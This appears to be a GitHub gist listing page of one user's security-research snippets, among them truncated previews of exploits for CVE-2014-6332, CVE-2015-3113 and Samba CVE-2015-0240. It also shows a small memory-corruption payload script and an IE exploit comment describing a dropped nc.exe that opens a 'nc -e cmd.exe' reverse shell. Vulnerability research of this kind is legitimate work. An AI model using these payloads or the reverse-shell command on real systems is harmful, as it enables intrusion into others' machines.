huyna
/ cve2015_3113.as
Last active
August 30, 2015 06:00
— forked from mak/cve2015_3113.as
CVE-2015-3113 from 205a625ebc3b0a9b286dc8f065845433
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package | |
| { | |
| import flash.display.MovieClip; | |
| import flash.utils.ByteArray; | |
| import flash.net.URLLoader; | |
| import flash.utils.Timer; | |
| import flash.media.Video; | |
| import flash.display.Loader; | |
| import flash.net.URLRequest; | |
| import flash.events.Event; |
huyna
/ strace-static.diff
Created
October 1, 2015 10:06
— forked from jduck/strace-static.diff
Enable static for building strace for Android
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # dev:~/android/source/external/strace$ git diff | |
| # | |
| # to apply & build: | |
| # | |
| # dev:~/android/source/external/strace$ patch -p1 < strace-static.diff | |
| # dev:~/android/source/external/strace$ cd ../.. | |
| # dev:~/android/source$ mmm external/strace | |
| # | |
| diff --git a/Android.mk b/Android.mk | |
| index 5274280..4f1707e 100644 |
huyna
/ PageHeap Error Windbg10
Created
October 14, 2015 03:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1:064> !heap -p -a 080b8c30 | |
| ReadMemory error for address 00000000 | |
| Use `!address 00000000' to check validity of the address. | |
| ReadMemory error for address 0e4c6f3a | |
| Use `!address 0e4c6f3a' to check validity of the address. | |
| ReadMemory error for address 00000000 | |
| Use `!address 00000000' to check validity of the address. | |
| ReadMemory error for address 09cf6f3a | |
| Use `!address 09cf6f3a' to check validity of the address. | |
| ReadMemory error for address 06cf6f3a |
huyna
/ extracting-tuesday-patches.ps
Created
October 16, 2015 01:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ================ | |
| PATCHEXTRACT.PS1 | |
| ================= | |
| Microsoft MSU Patch Extraction and Patch OrganizationUtility by Greg Linares (@Laughing_Mantis) | |
| This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders. | |
| Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64) | |
| as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| data1 = struct.pack('<i',0x08048883)+'\x00' | |
| data1 = data1+'b'*(38-len(data1))+ '\x18\xa0' | |
| data2 = struct.pack('<i',0x08048610)+'\x00' | |
| data2 = data2+'c'*(38-len(data2))+ '\x24\xa0' | |
| print data1+data2 |
huyna
/ idapython_struct.py
Created
October 26, 2015 06:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #--------------------------------------------------------------------- | |
| # Structure test | |
| # | |
| # This script demonstrates how to create structures and populate them | |
| # with members of different types. | |
| # | |
| # Author: Gergely Erdelyi <gergely.erdelyi@d-dome.net> | |
| #--------------------------------------------------------------------- | |
| from idaapi import stroffflag, offflag |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 3B9DCDD69AC7615CD0E2941DC8E23DDF | |
| 5730866B34EF589BD398C9A9B6D7E307 | |
| 7D71593A7D159C754055E16C26B844112E7B4132 |
huyna
/ cve-2014-6332_exploit.html
Created
December 15, 2015 02:34
— forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
huyna
/ http_sys_pseudo.c
Created
December 15, 2015 02:37
— forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
| All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
| For anyone want to know what function are patched. | |
| Just open patched version and find all functions reference to RtlULongLongAdd(). | |
| */ | |
huyna
/ cve-2015-0240_samba_exploit.py
Created
December 15, 2015 02:38
— forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
OlderNewer